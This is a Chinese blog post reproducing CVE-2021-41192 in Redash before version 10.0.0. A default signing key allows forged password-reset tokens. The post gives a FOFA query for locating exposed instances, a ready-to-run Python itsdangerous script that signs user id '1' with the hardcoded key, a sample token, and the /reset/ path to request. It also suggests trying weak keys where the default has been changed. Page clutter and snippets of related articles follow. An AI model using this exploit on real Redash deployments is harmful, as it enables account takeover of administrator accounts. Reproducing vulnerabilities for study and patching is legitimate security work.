Redash 默认key漏洞(CVE-2021-41192)复现

于 2024-01-25 14:51:00 发布
阅读量612 收藏 5
点赞数 10
分类专栏: 漏洞复现 文章标签: 漏洞复现 CVE-2021-41192 redash web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiayu729100940/article/details/135843934
版权

Redash是以色列Redash公司的一套数据整合分析解决方案。该产品支持数据整合、数据可视化、查询编辑和数据共享等。 Redash 10.0.0及之前版本存在安全漏洞,攻击者可利用该漏洞来使用已知的默认值伪造会话。

1.漏洞级别

中危

2.漏洞搜索

fofa

"redash"

3.影响范围

Redash < 10.0.0

4.漏洞复现

漏洞的产生主要原因是由于redash这个项目的token生成方式存在默认key,如果用户不手动修改的话,我们就可以利用他来生成一个有效的token。由于该产品的找回密码功能是通过用户的自增id生成token,因此我们可以直接生成一个有效的找回链接。
可以执行如下python代码

from itsdangerous import URLSafeTimedSerializer
if __name__ == "__main__":
    serializer = URLSafeTimedSerializer("c292a0a3aa32397cdb050e233733900f")
    key = serializer.dumps("1")
    print(key)

生成的有效负载:
IjEi.ZbIBdw.mxvud9Tkz_jfJ6UrVoVuffSxl18
  • 由于生成的有效负载存在过期时间,因此每次测试的时候最好重新生成一下。
  • "c292a0a3aa32397cdb050e233733900f"为默认key。如果用户手动修改了这个key,我们也可以尝试使用一些弱口令来生成负载尝试一下。
    访问路径
url/reset/IjEi.ZbIBdw.mxvud9Tkz_jfJ6UrVoVuffSxl18

如果出现即为漏洞存在
在这里插入图片描述
出现这个表示key已被修改过了
在这里插入图片描述
到这里漏洞就复现成功了。
如果有问题欢迎随时沟通~

在这里插入图片描述

fly夏天
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
redash-Version8.0.0-包含npm编译好的页面文件.zip
01-29
redash-Version8.0.0-包含npm编译好的页面文件
Redash开源的数据图表工具-其他
06-12
Redash旨在使任何人,无论技术水平如何,都可以利用大小数据的力量。SQL用户利用Redash来探索,查询,可视化和共享来自任何数据源的数据。他们的工作反过来使组织中的任何人都可以使用数据。每天,全球成千上万个组织中的数百万用户使用Redash来开发见解并制定数据驱动的决策。 Redash功能: 基于浏览器的:浏览器中的所有内容,都带有可共享的URL。 易于使用:无需掌握复杂软件即可立即获得数据。 查询编辑器:使用模式浏览器快速组成SQL和NoSQL查询并自动完成。 可视化和仪表板:通过拖放创建漂亮的可视化文件,并将它们组合成一个仪表板。 共享:通过共享可视化及其相关查询轻松进行协作,从而实现对报告和查询的同行审阅。 计划刷新:您定义的固定时间间隔自动更新图表和仪表盘。 警报:定义条件并在数据更改时立即得到警报。 REST API:可以通过REST API使用UI进行的所有操作。 对数据源的广泛支持:可扩展的数据源API,具有对一长串常见数据库和平台的本机支持。
PyPI 官网下载 | redash_toolbelt-0.1.0-py3-none-any.whl
02-07
资源来自pypi官网,解压后可用。 资源全名:redash_toolbelt-0.1.0-py3-none-any.whl
redash-mixpanel-query-runner:Redash的mixpanel查询运行器
05-01
redash-mixpanel-查询运行器 用于Mixpanel的JQL API的redash查询运行器。 安装 下载mixpanel_jql.py 将mixpanel_jql.py复制到Redash服务器上的/path/to/redash/redash/query_runner 。 修改环境var REDASH_ADDITIONAL_QUERY_RUNNERS以添加redash.query_runner.mixpanel_jql 必需的 必须使用Mixpanel python客户端库。 从下载并在您的服务器上设置。 用法 配置您的API机密 添加Mixpanel Jql作为新的数据源,然后配置您的Api secret 。 请参阅: : 运行查询 作为查询,编写jql。 像下面这样:
Python库 | redash_api_client-0.2.2-py3-none-any.whl
02-19
python库,解压后可用。 资源全名:redash_api_client-0.2.2-py3-none-any.whl
redashredash问题整理全(登录、查询)
Mrerlou的博客
09-10 1736
前言 最近在使用redash的过程中,遇到了不少问题,这里整理并记录一下。 问题一 问题描述: 登录ldap账号,提示用户名密码错误。 解决方案: 不能直接使用的下面的进行登录的,需要改成LDAP/SSO Logion 登录方式。 正确的ldap登录界面 问题二 问题描述: 使用ldap账号登录时,遇到如下报错界面。 问题原因: 可能是邮箱后缀发生过更改,如@shiguangjk.com 改为了@shimiaotech.com 解决方案: 进入管理界面,修改有问题的账号的邮箱后缀即可。 问题三
redash重置密码BUG解决
qq_42455809的博客
07-31 1298
redash邮件重置密码BUG解决方法 redash是一个比较少见的开源BI工具,由于其web框架使用的是Flask,所以其源码结构和内容还是相对容易看懂。今天在测试其重置密码功能时发现一个BUG,使得我在点击重置密码邮件中的链接时,总是会出现以下提示: 属实烦人。意思大概是你已经接受了邀请,请尝试重置您的密码。WTF???难道我现在不是在重置我的密码吗??但是尝试管理员账号之后发现管理员账号并...
【Linux】Redhat 8使用非官方源修复漏洞及关键案例分享
par@ish的博客
05-07 2817
先看下今天的任务,一台redhat 8.4,nessus扫出一百多个漏洞,且绝大多数都是高危漏洞,今天看看能修复多少。 通过对这些漏洞分析,大部分为需要更新package version,所以虽然多,但是还是不是很难。因为OS是redhat,但是因为还没有购买官方的订阅,所以无法在线更新。所以要先解决更新源的问题。 一、解决redhat更新源 关闭redhat默认订阅,并修改为centos源作为更新源。 sudo vi /etc/yum.repos.d/centos-vault.repo [BaseOS
CVE-2020-2021:SAML身份验证机制绕过漏洞通告
爱国小白帽
06-30 3471
CVE-2020-2021:SAML身份验证机制绕过漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年06月30日, 360CERT监测发现Palo Alto官方发布了SAML身份验证机制绕过的风险通告,该漏洞编号为CVE-2020-2021漏洞等级:高危。 安全声明标记语言(SAML)是用于根据用户在另一上下文中的会话将其登录到当前应用程序中的标准。 SAML身份验证机制存在身份验证绕过的威胁。当SAML开启,同时Vali
Metabase 敏感信息泄露漏洞复现CVE-2021-41277)
千寻的博客
12-20 1798
文章目录漏洞描述漏洞编号FOFA 查询影响范围修复版本:环境搭建漏洞复现漏洞修复摘抄 漏洞描述 metabase 是一个简单、开源的数据分析平台。 在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证 攻击者可通过该漏洞获得敏感信息。 漏洞编号 CVE-2021-41277 FOFA 查询 app=”metabase” 影响范围 metabase version &lt
PyPI 官网下载 | redash_api_client-0.2.2-py3-none-any.whl
01-07
资源来自pypi官网。 资源全名:redash_api_client-0.2.2-py3-none-any.whl
Redash部署教程-CentOS7-去除访问凭据-20220526-JasonLee
09-30
Redash部署教程_CentOS7
redash-scheduled-email
05-10
Redash报告电子邮件发件人 创建它是为了每周发送一次redash报告。 设置 确保已安装无服务器,请在此处进行说明: 按照以下模板创建env.yaml: # e.g. ...
redash-7.0.0.zip
04-06
Redash 是一款开源的 BI 工具,提供了基于 web 的数据库查询和数据可视化功能。Redash允许快速和方便地访问数十亿条记录,使用Amzon Redshift处理和收集这些记录。Redash支持查询多个数据库,包括:Redshift、Google...
redash-client:用于JavaScript的Redash API客户端
05-13
$ npm install redash-client 用法 const RedashClient = require ( 'redash-client' ) ; const redash = new RedashClient ( { endPoint : 'https://your-redash.com/' , apiToken : 'abcde12345' , } ) ; redash...
Python-Redash连接到任何数据源轻松可视化和分享你的数据
08-10
Redash: 连接到任何数据源,轻松可视化和分享你的数据
contrib-helm-chart:社区维护的Redash头盔图表
04-24
Redash Redash是一个开放源代码工具,供团队查询,可视化和协作。介绍该图表使用软件包管理器在集群上引导了部署。 这是一个由志愿者开发的贡献项目,并未得到Redash的正式支持。 当前图表版本为2.3.1先决条件群集上...
redash-toolbelt:API客户端和实用程序来管理Redash实例
05-07
redash工具带 API客户端和实用程序来管理Redash实例
PyPI 官网下载 | redash-stmo-2019.6.1.tar.gz
01-15
资源来自pypi官网。 资源全名:redash-stmo-2019.6.1.tar.gz
centos7用容器部署中文版redash
最新发布
05-23
以下是在 CentOS 7 上使用 Docker 容器部署中文版 Redash 的步骤: 1. 安装 Docker 和 Docker Compose: ``` yum install docker docker-compose -y ``` 2. 启动 Docker 服务: ``` systemctl start docker ``` 3. 下载 Redash 中文版镜像: ``` docker pull redash/redash:8.0.0.b32245 ``` 4. 创建 Redash 配置文件夹并下载配置文件: ``` mkdir /opt/redash cd /opt/redash curl -L -o env 环境变量地址 curl -L -o docker-compose.yml 配置文件地址 ``` 5. 修改 env 文件,配置数据库信息、邮件服务器信息和 Redash 管理员账号信息等。 6. 启动 Redash: ``` docker-compose up -d ``` 7. 访问 http://your-redash-server-ip:5000 即可开始使用中文版 Redash。 注意:在运行 Redash 之前,请确保您的服务器上已经安装了 PostgreSQL 数据库,并且您已经创建了一个数据库以供 Redash 使用。此外,如果您想将 Redash 与其它服务集成,例如 LDAP 或 SAML,您还需要修改配置文件和 env 文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值